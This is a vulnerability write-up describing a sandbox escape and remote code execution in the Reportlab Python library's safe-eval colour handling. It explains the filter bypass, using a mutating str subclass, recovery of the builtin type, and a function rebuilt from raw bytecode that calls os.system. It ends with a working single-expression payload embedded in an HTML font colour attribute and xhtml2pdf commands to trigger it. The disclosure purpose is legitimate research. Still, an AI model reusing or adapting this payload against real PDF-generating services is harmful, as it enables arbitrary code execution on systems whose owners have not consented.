tl;dr This write-up details how an RCE in Reportlab was found and exploited. Because Reportlab is widely used for HTML-to-PDF conversion, this vulnerability may be reachable in many applications that generate PDF files, making it an important one to patch and look out for.
A few days ago, during a web application audit, we noticed that the application was using the Reportlab Python library to dynamically generate PDF files from HTML input. Reportlab had a previously patched vulnerability leading to code execution, so finding a bypass to the patch was interesting from an attacker's point of view: it would restore the code execution, and the Reportlab library is also used in other applications and tools.
First things first, a quick recap: Reportlab is an open source project that allows the creation of documents in Adobe's Portable Document Format (PDF) using the Python programming language. It also creates charts and data graphics in various bitmap and vector formats as well as PDF.
In 2019 the library was affected by a similar vulnerability leading to remote code execution via the color attribute of HTML tags: the content of the attribute was evaluated directly as a Python expression using the eval function, leading to code execution. To mitigate the issue, Reportlab implemented a sandbox called rl_safe_eval, which is stripped of all Python builtin functions and overrides several builtins, so that the library's safe code can still run while access to dangerous functions and libraries, which could be used to construct dangerous Python code, is blocked.
One example of these prevention measures is that the builtin getattr function is overridden with a restricted function, __rl_getattr__, which prohibits access to dangerous attributes of objects, such as those whose names start with __:
class __RL_SAFE_ENV__(object):
    __time_time__ = time.time
    __weakref_ref__ = weakref.ref
    __slicetype__ = type(slice(0))
    def __init__(self, timeout=None, allowed_magic_methods=None):
        self.timeout = timeout if timeout is not None else self.__rl_tmax__
        self.allowed_magic_methods = (__allowed_magic_methods__ if allowed_magic_methods==True
                                else allowed_magic_methods) if allowed_magic_methods else []
        #[...]
        # IN THIS LINE IT CAN BE OBSERVED THAT THE BUILTIN GETATTR IS REPLACED WITH A CUSTOM FUNCTION
        # THAT CHECKS THE SAFETY OF THE PASSED ATTRIBUTE NAME BEFORE GETTING IT
        __rl_builtins__['getattr'] = self.__rl_getattr__
        __rl_builtins__['dict'] = __rl_dict__
    #[...]
    def __rl_getattr__(self, obj, a, *args):
        if isinstance(obj, strTypes) and a=='format':
            raise BadCode('%s.format is not implemented' % type(obj))
        # MULTIPLE CHECKS ARE DONE BEFORE FETCHING THE ATTRIBUTE AND RETURNING IT
        # TO THE CALLER IN THE SANDBOXED EVAL ENVIRONMENT
        self.__rl_is_allowed_name__(a)
        return getattr(obj,a,*args)
    def __rl_is_allowed_name__(self, name):
        """Check names if they are allowed.
        If ``allow_magic_methods is True`` names in `__allowed_magic_methods__`
        are additionally allowed although their names start with `_`.
        """
        if isinstance(name,strTypes):
            # NO ACCESS TO ATTRIBUTES THAT START WITH __ OR MATCH A PREDEFINED UNSAFE ATTRIBUTE NAME
            if name in __rl_unsafe__ or (name.startswith('__')
                and name!='__'
                and name not in self.allowed_magic_methods):
                raise BadCode('unsafe access of %s' % name)
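The guard above can be approximated outside of Reportlab with a minimal sketch. The names `UNSAFE_NAMES`, `is_allowed_name` and `guarded_getattr` are illustrative stand-ins, not Reportlab's API, and the contents of the unsafe set are an assumption chosen for the example:

```python
# Simplified stand-in for the sandbox's attribute guard (illustrative names only).
UNSAFE_NAMES = frozenset(['func_code', 'gi_frame'])  # hypothetical subset


class BadCode(ValueError):
    """Raised when an expression tries to reach a forbidden attribute."""


def is_allowed_name(name):
    # Reject names in the unsafe set and any name starting with a double underscore.
    if isinstance(name, str):
        if name in UNSAFE_NAMES or (name.startswith('__') and name != '__'):
            raise BadCode('unsafe access of %s' % name)


def guarded_getattr(obj, name, *default):
    # Check the name first, then defer to the real builtin getattr.
    is_allowed_name(name)
    return getattr(obj, name, *default)


print(guarded_getattr('abc', 'upper')())  # ordinary attribute access still works
try:
    guarded_getattr(lambda: None, '__code__')
except BadCode as exc:
    print('blocked:', exc)
```

Note that the check relies entirely on how the name object answers `in` and `startswith`, which is what the rest of this write-up abuses.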
As described earlier, the safe eval strips all dangerous functions from the environment so that the executing code has no access to tools that could be used for malicious actions. However, if a bypass to those restrictions is found and access to one of the original builtin functions is achieved, exploiting the sandboxed environment becomes much easier.
One of the many overridden builtins is type. When called with one argument, it returns the type of an object; when called with three arguments, it returns a new type object. This is essentially a dynamic form of the class statement. In other words, it allows the creation of a new class that inherits from another class.
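As a quick illustration of the two call forms of the builtin type, here is a small sketch; the class name `Greeting` and its `shout` method are made up for the example:

```python
# One argument: type() reports the class of an object.
print(type(42))

# Three arguments: type(name, bases, namespace) builds a new class dynamically,
# here a str subclass with one extra method.
Greeting = type('Greeting', (str,), {'shout': lambda self: self.upper() + '!'})

g = Greeting('hello')
print(isinstance(g, str), g.shout())
```

The three-argument form is equivalent to writing `class Greeting(str): ...` with the same method in the class body.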
So the idea here is to create a new class called Word that inherits from str and that, when passed to the custom getattr, bypasses the checks and allows access to sensitive attributes like __code__.
Before the custom getattr in the sandboxed eval returns the attribute, it calls __rl_is_allowed_name__ to check the safety of the requested attribute name, then calls the Python builtin getattr and returns the result.
def __rl_is_allowed_name__(self, name):
    """Check names if they are allowed.
    If ``allow_magic_methods is True`` names in `__allowed_magic_methods__`
    are additionally allowed although their names start with `_`.
    """
    if isinstance(name,strTypes):
        if name in __rl_unsafe__ or (name.startswith('__')
            and name!='__'
            and name not in self.allowed_magic_methods):
            raise BadCode('unsafe access of %s' % name)
To bypass the __rl_is_allowed_name__ function, the Word class should:
- Always return False for calls to startswith, to bypass the name.startswith('__') check.
- Return False on its first call to __eq__, to bypass the name in __rl_unsafe__ check. After the first call it should return the correct response, because when __eq__ is called by the Python builtin getattr it must return the correct result.
- Have the same hash as its underlying string.
The following class fulfills these criteria:
Word = type('Word', (str,), {
    'mutated'   : 1,
    'startswith': lambda self, x: False,
    '__eq__'    : lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate'    : lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    '__hash__'  : lambda self: hash(str(self))
})
code = Word('__code__')
print(code == '__code__') ## prints False
print(code == '__code__') ## prints True
print(code == '__code__') ## prints True
print(code == '__code__') ## prints True
print(code.startswith('__')) ## prints False
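To see the three criteria working together, the sketch below runs a Word instance through a simplified copy of the name check. The helper names `UNSAFE_NAMES`, `is_allowed_name` and `guarded_getattr` are illustrative, and the set contents are an assumption (it deliberately contains `'__code__'` so that both halves of the check are exercised):

```python
# Simplified copy of the check; UNSAFE_NAMES contents are assumed for the demo.
UNSAFE_NAMES = frozenset(['__code__', 'func_code'])


class BadCode(ValueError):
    pass


def is_allowed_name(name):
    if isinstance(name, str):
        if name in UNSAFE_NAMES or (name.startswith('__') and name != '__'):
            raise BadCode('unsafe access of %s' % name)


def guarded_getattr(obj, name):
    is_allowed_name(name)
    return getattr(obj, name)


Word = type('Word', (str,), {
    'mutated': 1,
    # Defeats the startswith('__') test.
    'startswith': lambda self, x: False,
    # False on the first comparison (the set membership test), truthful afterwards.
    '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    # Same hash as the plain string, so dictionary lookups still find the attribute.
    '__hash__': lambda self: hash(str(self)),
})

target = lambda: None

try:
    guarded_getattr(target, '__code__')
except BadCode as exc:
    print('plain str blocked:', exc)

# A fresh Word instance passes the check and reaches the real attribute.
leaked = guarded_getattr(target, Word('__code__'))
print(leaked is target.__code__)
```

Each Word instance only lies once, so a fresh instance is needed for every guarded lookup.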
The custom type function in the safe eval does not accept three arguments:
def __rl_type__(self,*args):
    if len(args)==1: return type(*args)
    raise BadCode('type call error')
A bypass for this was found by applying type to the result of a type call, which returns the original builtin type function:
orgTypeFun = type(type(1))
Combining these two pieces of code gives something like this:
orgTypeFun = type(type(1))
Word = orgTypeFun('Word', (str,), {
    'mutated'   : 1,
    'startswith': lambda self, x: False,
    '__eq__'    : lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate'    : lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    '__hash__'  : lambda self: hash(str(self))
})
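The type recovery step can be checked in isolation. In this sketch `restricted_type` is a standalone stand-in for the sandbox's one-argument wrapper (an assumption for illustration, not the method from Reportlab itself):

```python
class BadCode(ValueError):
    pass


def restricted_type(*args):
    # Mirrors the restriction: only the one-argument form is allowed.
    if len(args) == 1:
        return type(*args)
    raise BadCode('type call error')


# The three-argument form is refused by the wrapper...
try:
    restricted_type('Word', (str,), {})
except BadCode as exc:
    print('blocked:', exc)

# ...but the class of any class is the real builtin type, so two
# one-argument calls hand the unrestricted function back.
recovered = restricted_type(restricted_type(1))
print(recovered is type)

Word = recovered('Word', (str,), {})
print(issubclass(Word, str))
```

The wrapper limits how type can be called, but not what it returns, which is why the original function leaks.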
Now what is left is to write the exploit.
To do this, a function is reconstructed from the bytecode of a compiled one:
orgTypeFun = type(type(1))
Word = orgTypeFun('Word', (str,), {
    'mutated': 1,
    'startswith': lambda self, x: False,
    '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x,
    'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
    '__hash__': lambda self: hash(str(self))
})
codeattr = Word('__code__')
ftype = orgTypeFun(lambda: {None})
ctype = orgTypeFun(getattr(lambda: {None},codeattr))
# The byte code is of a function that looks like this
# def exp():
#     __import__('os').system('touch /tmp/exploited')
f = ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00',
          (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})
f()
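The function and code types used above are the same objects that the standard `types` module exposes. The harmless sketch below rebuilds a function from an existing code object instead of from raw bytes, since raw bytecode and the argument list of the code constructor are tied to a specific CPython version; the names `template` and `rebuilt` are made up for the example:

```python
import types

# A harmless template whose body needs no globals or builtins.
template = lambda: 6 * 7

# type() on a function and on its code object yields the constructors
# that the exploit calls ftype and ctype.
ftype = type(template)
ctype = type(template.__code__)
print(ftype is types.FunctionType, ctype is types.CodeType)

# A function is just a code object paired with a globals dictionary.
rebuilt = ftype(template.__code__, {})
print(rebuilt())
```

This is only meant to show the mechanism: once both constructors are reachable, any code object can be wrapped into a callable.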
However, a multiline program like this cannot be executed in an eval context, which only accepts a single expression. To bypass this issue, a list comprehension trick can be used, something like this:
[print(x) for x in ['helloworld']]
# which would be equivalent to
x='helloworld'
print(x)
[[print(x + ' ' + y) for y in ['second var']] for x in ['first var']]
# which would be equivalent to
x='first var'
y='second var'
print(x + ' ' + y)
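The trick can be verified directly with eval. This is a small sketch using made-up variable names, showing that an assignment statement is rejected while the comprehension form binds the same names inside a single expression:

```python
# Statements such as assignments are not valid input for eval().
try:
    eval("x = 'first var'")
except SyntaxError:
    print('assignment rejected')

# Each "for name in [value]" clause acts as an assignment; the outermost
# clause is bound first, and inner comprehensions can read it.
expr = "[[x + ' ' + y for y in ['second var']] for x in ['first var']]"
result = eval(expr)
print(result)  # [['first var second var']]
```

Every nesting level adds one more binding, which is why the outermost clause corresponds to the first declaration.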
With this technique, the exploit code can be rewritten as a single expression like this. It is considered one line; the line breaks here are just formatting to make the exploit more readable. The declarations should be read from bottom to top, which is weird, but this is how it works:
[
    [
        [
            [
                ftype(ctype(0, 0, 0, 0, 3, 67, b't\x00d\x01\x83\x01\xa0\x01d\x02\xa1\x01\x01\x00d\x00S\x00',
                      (None, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\x12\x01'), {})()
                for ftype in [type(lambda: None)]
            ]
            for ctype in [type(getattr(lambda: {None}, Word('__code__')))]
        ]
        for Word in [orgTypeFun('Word', (str,), {
            'mutated': 1,
            'startswith': lambda self, x: False,
            '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x,
            'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)},
            '__hash__': lambda self: hash(str(self))
        })]
    ]
    for orgTypeFun in [type(type(1))]
]
Please refer to poc.py, which contains a proof of concept that demonstrates the code execution (upon successful exploitation, a file called exploited is created in /tmp/).
Many apps and libraries use the Reportlab library. For example, the xhtml2pdf utility is vulnerable and can suffer from code execution while converting malicious HTML to PDF:
cat >mallicious.html <<EOF
<para><font color="[ [ [ [ [ ftype(ctype(0, 0, 0, 0, 3, 67, b't\\x00d\\x01\\x83\\x01\\xa0\\x01d\\x02\\xa1\\x01\\x01\\x00d\\x00S\\x00', (none, 'os', 'touch /tmp/exploited'), ('__import__', 'system'), (), '<stdin>', '', 1, b'\\x12\\x01'), {})() for ftype in [type(lambda: none)] ] for ctype in [type(getattr(lambda: {none}, Word('__code__')))] ] for Word in [orgTypeFun('Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1==0, '__eq__': lambda self,x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: {setattr(self, 'mutated', self.mutated - 1)}, '__hash__': lambda self: hash(str(self)) })] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]]">
exploit
</font></para>
EOF
xhtml2pdf mallicious.html
ls -al /tmp/exploited